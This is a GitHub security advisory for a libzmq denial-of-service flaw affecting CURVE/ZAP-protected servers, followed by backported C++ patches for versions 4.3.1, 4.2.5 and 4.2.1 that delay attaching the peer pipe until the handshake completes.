Skip to content

Denial-of-Service on CURVE/ZAP-protected servers by unauthenticated clients

High
bluca published GHSA-25wp-cf8g-938m Sep 7, 2020

Package

libzmq

Affected versions

<= 4.3.2

Patched versions

4.3.3

Description

Impact

Users with TCP transport public endpoints, even with CURVE/ZAP enabled

Patches

#3913
#3973

4.3.1
From f9396304075467cab67affca7ee34a3caa7019a6 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index dfbdd265..a12ec6f2 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -40,6 +40,10 @@ struct i_engine
 {
     virtual ~i_engine () {}
 
+    //  Indicate if the engine has an handshake stage.
+    //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+    virtual bool has_handshake_stage () = 0;
+
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
                        class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 579c5042..bc95fc5e 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -127,7 +127,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index fa2222ca..d2316370 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -173,7 +173,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 733f24fc..86095b65 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -28,6 +28,8 @@ class norm_engine_t : public io_object_t, public i_engine
     int init (const char *network_, bool send, bool recv);
     void shutdown ();
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index d5eca74d..7edc4c30 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -55,6 +55,7 @@ class pgm_receiver_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index 1eb0b1f1..88b82946 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -54,6 +54,7 @@ class pgm_sender_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index ef7daf95..b627fc82 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -289,7 +289,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (_engine == NULL)) {
-        _pipe->check_read ();
+        if (_pipe)
+            _pipe->check_read ();
         return;
     }
 
@@ -388,7 +389,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!_engine);
+    _engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    _engine->plug (_io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!_pipe && !is_terminating ()) {
         object_t *parents[2] = {this, _socket};
@@ -412,11 +424,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (_socket, pipes[1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!_engine);
-    _engine = engine_;
-    _engine->plug (_io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index 002cdf87..b106e43f 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -62,6 +62,7 @@ class session_base_t : public own_t, public io_object_t, public i_pipe_events
     void flush ();
     void rollback ();
     void engine_error (zmq::stream_engine_t::error_reason_t reason_);
+    void engine_ready ();
 
     //  i_pipe_events interface implementation.
     void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index ada20726..ca4aba3a 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine =
-                  new (std::nothrow) stream_engine_t (_s, options, _endpoint);
+                  new (std::nothrow) stream_engine_t (_s, options, _endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 4b13012d..5d372780 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -65,7 +65,8 @@
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_,
                                        const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     _s (fd_),
     _handle (static_cast<handle_t> (NULL)),
     _inpos (NULL),
@@ -79,6 +80,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_,
     _greeting_size (v2_greeting_size),
     _greeting_bytes_read (0),
     _session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     _options (options_),
     _endpoint (endpoint_),
     _plugged (false),
@@ -290,9 +292,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!_io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (_handshaking))
+    if (unlikely (_handshaking)) {
         if (!handshake ())
             return;
+        else if (_mechanism == NULL && _has_handshake_stage)
+            _session->engine_ready ();
+    }
 
     zmq_assert (_decoder);
 
@@ -896,6 +901,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         _has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        _session->engine_ready ();
+
     bool flush_session = false;
 
     if (_options.recv_routing_id) {
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index a8149fd2..05212670 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ class stream_engine_t : public io_object_t, public i_engine
 
     stream_engine_t (fd_t fd_,
                      const options_t &options_,
-                     const std::string &endpoint_);
+                     const std::string &endpoint_,
+                     bool has_handshake_stage_);
     ~stream_engine_t ();
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return _has_handshake_stage; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     bool restart_input ();
@@ -188,6 +190,10 @@ class stream_engine_t : public io_object_t, public i_engine
     //  The session this engine is attached to.
     zmq::session_base_t *_session;
 
+    //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+    //  when handshake is completed.
+    bool _has_handshake_stage;
+
     const options_t _options;
 
     // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index b55d87fc..e8f1b573 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -155,7 +155,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, _endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, _endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index 19baaa1d..a64b93a2 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -116,7 +116,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, _endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, _endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 168a0d40..b18aafe7 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -129,7 +129,7 @@ void zmq::tipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 9c05f765..2cf1f5ca 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -98,7 +98,7 @@ void zmq::tipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 9bf5a533..db93e9a6 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -22,6 +22,8 @@ class udp_engine_t : public io_object_t, public i_engine
 
     int init (address_t *address_, bool send_, bool recv_);
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.2.5
From 8f6803867ba41359b36c2c88f91c68c7e76f4001 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 5e610468..55cafb4f 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -40,6 +40,10 @@ struct i_engine
 {
     virtual ~i_engine () {}
 
+    //  Indicate if the engine has an handshake stage.
+    //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+    virtual bool has_handshake_stage () = 0;
+
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
                        class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index eaebfe9f..e0adf081 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -127,7 +127,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 470aef75..be0c6c38 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -174,7 +174,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index c3ce9296..1370edbf 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -27,6 +27,8 @@ class norm_engine_t : public io_object_t, public i_engine
     int init (const char *network_, bool send, bool recv);
     void shutdown ();
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index d377d8fd..13282bc8 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -55,6 +55,7 @@ class pgm_receiver_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index dfc79425..d6882beb 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -54,6 +54,7 @@ class pgm_sender_t : public io_object_t, public i_engine
     int init (bool udp_encapsulation_, const char *network_);
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return false; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index dfb2c205..ef3e24e3 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -281,7 +281,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -380,7 +381,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents[2] = {this, socket};
@@ -408,11 +420,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes[1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index ae9f3a71..55845855 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -64,6 +64,7 @@ class session_base_t : public own_t, public io_object_t, public i_pipe_events
     virtual void reset ();
     void flush ();
     void engine_error (zmq::stream_engine_t::error_reason_t reason);
+    void engine_ready ();
 
     //  i_pipe_events interface implementation.
     void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index 7dfc8a85..0a53e8b2 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -152,7 +152,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine =
-                  new (std::nothrow) stream_engine_t (s, options, endpoint);
+                  new (std::nothrow) stream_engine_t (s, options, endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index e6455318..5c17b019 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -64,7 +64,8 @@
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_,
                                        const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     as_server (false),
     handle ((handle_t) NULL),
@@ -79,6 +80,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_,
     greeting_size (v2_greeting_size),
     greeting_bytes_read (0),
     session (NULL),
+    _has_handshake_stage (has_handshake_stage_),
     options (options_),
     endpoint (endpoint_),
     plugged (false),
@@ -288,9 +290,12 @@ void zmq::stream_engine_t::in_event ()
     zmq_assert (!io_error);
 
     //  If still handshaking, receive and process the greeting message.
-    if (unlikely (handshaking))
+    if (unlikely (handshaking)) {
         if (!handshake ())
             return;
+        else if (mechanism == NULL && _has_handshake_stage)
+            session->engine_ready ();
+    }
 
     zmq_assert (decoder);
 
@@ -826,6 +831,9 @@ void zmq::stream_engine_t::mechanism_ready ()
         has_heartbeat_timer = true;
     }
 
+    if (_has_handshake_stage)
+        session->engine_ready ();
+
     if (options.recv_routing_id) {
         msg_t routing_id;
         mechanism->peer_routing_id (&routing_id);
diff --git a/src/stream_engine.hpp b/src/stream_engine.hpp
index 0b422c25..0ee51a1e 100644
--- a/src/stream_engine.hpp
+++ b/src/stream_engine.hpp
@@ -70,10 +70,12 @@ class stream_engine_t : public io_object_t, public i_engine
 
     stream_engine_t (fd_t fd_,
                      const options_t &options_,
-                     const std::string &endpoint);
+                     const std::string &endpoint,
+                     bool has_handshake_stage);
     ~stream_engine_t ();
 
     //  i_engine interface implementation.
+    bool has_handshake_stage () { return _has_handshake_stage; };
     void plug (zmq::io_thread_t *io_thread_, zmq::session_base_t *session_);
     void terminate ();
     void restart_input ();
@@ -178,6 +180,10 @@ class stream_engine_t : public io_object_t, public i_engine
     //  The session this engine is attached to.
     zmq::session_base_t *session;
 
+    //  Indicate if engine has an handshake stage, if it does, engine must call session.engine_ready
+    //  when handshake is completed.
+    bool _has_handshake_stage;
+
     const options_t options;
 
     // String representation of endpoint
diff --git a/src/tcp_connecter.cpp b/src/tcp_connecter.cpp
index 0a2068e9..f3f2ae1c 100644
--- a/src/tcp_connecter.cpp
+++ b/src/tcp_connecter.cpp
@@ -151,7 +151,7 @@ void zmq::tcp_connecter_t::out_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tcp_listener.cpp b/src/tcp_listener.cpp
index a4e1cbfa..e41ca979 100644
--- a/src/tcp_listener.cpp
+++ b/src/tcp_listener.cpp
@@ -116,7 +116,7 @@ void zmq::tcp_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/tipc_connecter.cpp b/src/tipc_connecter.cpp
index 4f0a2992..0d16fd9f 100644
--- a/src/tipc_connecter.cpp
+++ b/src/tipc_connecter.cpp
@@ -129,7 +129,7 @@ void zmq::tipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/tipc_listener.cpp b/src/tipc_listener.cpp
index 9c05f765..2cf1f5ca 100644
--- a/src/tipc_listener.cpp
+++ b/src/tipc_listener.cpp
@@ -98,7 +98,7 @@ void zmq::tipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine =
-      new (std::nothrow) stream_engine_t (fd, options, endpoint);
+      new (std::nothrow) stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/udp_engine.hpp b/src/udp_engine.hpp
index 1a02c524..4f97474a 100644
--- a/src/udp_engine.hpp
+++ b/src/udp_engine.hpp
@@ -23,6 +23,8 @@ class udp_engine_t : public io_object_t, public i_engine
 
     int init (address_t *address_, bool send_, bool recv_);
 
+    bool has_handshake_stage () { return false; };
+
     //  i_engine interface implementation.
     //  Plug the engine to the session.
     void plug (zmq::io_thread_t *io_thread_, class session_base_t *session_);
4.2.1
From 6557497b7095399424fe24e83bd936a3d54d4175 Mon Sep 17 00:00:00 2001
From: Doron Somech <somdoron@gmail.com>
Date: Wed, 13 May 2020 17:32:06 +0300
Subject: [PATCH] problem: zeromq connects peer before handshake is completed

Solution: delay connecting the peer pipe until the handshake is completed
(cherry picked from commit e7f0090b161ce6344f6bd35009816a925c070b09)

Conflicts:
	src/i_engine.hpp
	src/norm_engine.hpp
	src/pgm_receiver.hpp
	src/pgm_sender.hpp
	src/raw_engine.cpp
	src/session_base.cpp
	src/session_base.hpp
	src/stream_engine_base.cpp
	src/stream_engine_base.hpp
	src/udp_engine.hpp
	src/ws_engine.cpp
	src/zmtp_engine.cpp
---
 src/i_engine.hpp        |  4 ++++
 src/ipc_connecter.cpp   |  2 +-
 src/ipc_listener.cpp    |  2 +-
 src/norm_engine.hpp     |  2 ++
 src/pgm_receiver.hpp    |  1 +
 src/pgm_sender.hpp      |  1 +
 src/session_base.cpp    | 19 +++++++++++++------
 src/session_base.hpp    |  1 +
 src/socks_connecter.cpp |  2 +-
 src/stream_engine.cpp   | 12 ++++++++++--
 src/stream_engine.hpp   |  8 +++++++-
 src/tcp_connecter.cpp   |  2 +-
 src/tcp_listener.cpp    |  2 +-
 src/tipc_connecter.cpp  |  2 +-
 src/tipc_listener.cpp   |  2 +-
 src/udp_engine.hpp      |  2 ++
 16 files changed, 48 insertions(+), 16 deletions(-)

diff --git a/src/i_engine.hpp b/src/i_engine.hpp
index 506ff8c7..1fb13f0b 100644
--- a/src/i_engine.hpp
+++ b/src/i_engine.hpp
@@ -41,6 +41,10 @@ namespace zmq
     {
         virtual ~i_engine () {}
 
+        //  Indicate if the engine has an handshake stage.
+        //  If engine has handshake stage, engine must call session.engine_ready when the handshake is complete.
+        virtual bool has_handshake_stage () = 0;
+
         //  Plug the engine to the session.
         virtual void plug (zmq::io_thread_t *io_thread_,
             class session_base_t *session_) = 0;
diff --git a/src/ipc_connecter.cpp b/src/ipc_connecter.cpp
index 48793e8c..9fd47a04 100644
--- a/src/ipc_connecter.cpp
+++ b/src/ipc_connecter.cpp
@@ -123,7 +123,7 @@ void zmq::ipc_connecter_t::out_event ()
     }
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Attach the engine to the corresponding session object.
diff --git a/src/ipc_listener.cpp b/src/ipc_listener.cpp
index 62b75c66..0b81c689 100644
--- a/src/ipc_listener.cpp
+++ b/src/ipc_listener.cpp
@@ -172,7 +172,7 @@ void zmq::ipc_listener_t::in_event ()
 
     //  Create the engine object for this connection.
     stream_engine_t *engine = new (std::nothrow)
-        stream_engine_t (fd, options, endpoint);
+        stream_engine_t (fd, options, endpoint, !options.raw_socket);
     alloc_assert (engine);
 
     //  Choose I/O thread to run connecter in. Given that we are already
diff --git a/src/norm_engine.hpp b/src/norm_engine.hpp
index 5d059ec7..a749e758 100644
--- a/src/norm_engine.hpp
+++ b/src/norm_engine.hpp
@@ -27,6 +27,8 @@ namespace zmq
             int init(const char* network_, bool send, bool recv);
             void shutdown();
 
+            bool has_handshake_stage () { return false; };
+
             //  i_engine interface implementation.
             //  Plug the engine to the session.
             virtual void plug (zmq::io_thread_t *io_thread_,
diff --git a/src/pgm_receiver.hpp b/src/pgm_receiver.hpp
index 52251b15..e91c0f06 100644
--- a/src/pgm_receiver.hpp
+++ b/src/pgm_receiver.hpp
@@ -58,6 +58,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/pgm_sender.hpp b/src/pgm_sender.hpp
index de1c72e2..51f6f88c 100644
--- a/src/pgm_sender.hpp
+++ b/src/pgm_sender.hpp
@@ -57,6 +57,7 @@ namespace zmq
         int init (bool udp_encapsulation_, const char *network_);
 
         //  i_engine interface implementation.
+        bool has_handshake_stage () { return false; };
         void plug (zmq::io_thread_t *io_thread_,
             zmq::session_base_t *session_);
         void terminate ();
diff --git a/src/session_base.cpp b/src/session_base.cpp
index 7ce1a2d6..99900045 100644
--- a/src/session_base.cpp
+++ b/src/session_base.cpp
@@ -278,7 +278,8 @@ void zmq::session_base_t::read_activated (pipe_t *pipe_)
     }
 
     if (unlikely (engine == NULL)) {
-        pipe->check_read ();
+        if (pipe)
+            pipe->check_read ();
         return;
     }
 
@@ -375,7 +376,18 @@ bool zmq::session_base_t::zap_enabled ()
 void zmq::session_base_t::process_attach (i_engine *engine_)
 {
     zmq_assert (engine_ != NULL);
+    zmq_assert (!engine);
+    engine = engine_;
 
+    if (!engine_->has_handshake_stage ())
+        engine_ready ();
+
+    //  Plug in the engine.
+    engine->plug (io_thread, this);
+}
+
+void zmq::session_base_t::engine_ready ()
+{
     //  Create the pipe if it does not exist yet.
     if (!pipe && !is_terminating ()) {
         object_t *parents [2] = {this, socket};
@@ -404,11 +416,6 @@ void zmq::session_base_t::process_attach (i_engine *engine_)
         //  Ask socket to plug into the remote end of the pipe.
         send_bind (socket, pipes [1]);
     }
-
-    //  Plug in the engine.
-    zmq_assert (!engine);
-    engine = engine_;
-    engine->plug (io_thread, this);
 }
 
 void zmq::session_base_t::engine_error (
diff --git a/src/session_base.hpp b/src/session_base.hpp
index c1071767..2bccbd08 100644
--- a/src/session_base.hpp
+++ b/src/session_base.hpp
@@ -67,6 +67,7 @@ namespace zmq
         virtual void reset ();
         void flush ();
         void engine_error (zmq::stream_engine_t::error_reason_t reason);
+        void engine_ready ();
 
         //  i_pipe_events interface implementation.
         void read_activated (zmq::pipe_t *pipe_);
diff --git a/src/socks_connecter.cpp b/src/socks_connecter.cpp
index e56eb6ed..1d34d2dd 100644
--- a/src/socks_connecter.cpp
+++ b/src/socks_connecter.cpp
@@ -151,7 +151,7 @@ void zmq::socks_connecter_t::in_event ()
             else {
                 //  Create the engine object for this connection.
                 stream_engine_t *engine = new (std::nothrow)
-                    stream_engine_t (s, options, endpoint);
+                    stream_engine_t (s, options, endpoint, !options.raw_socket);
                 alloc_assert (engine);
 
                 //  Attach the engine to the corresponding session object.
diff --git a/src/stream_engine.cpp b/src/stream_engine.cpp
index 920d5956..bb886513 100644
--- a/src/stream_engine.cpp
+++ b/src/stream_engine.cpp
@@ -63,7 +63,8 @@
 #include "wire.hpp"
 
 zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
-                                       const std::string &endpoint_) :
+                                       const std::string &endpoint_,
+                                       bool has_handshake_stage_) :
     s (fd_),
     as_server(false),
     handle((handle_t)NULL),
@@ -78,6 +79,7 @@ zmq::stream_engine_t::stream_engine_t (fd_t fd_, const options_t &options_,
     greeting_size (v2_greeting_size),
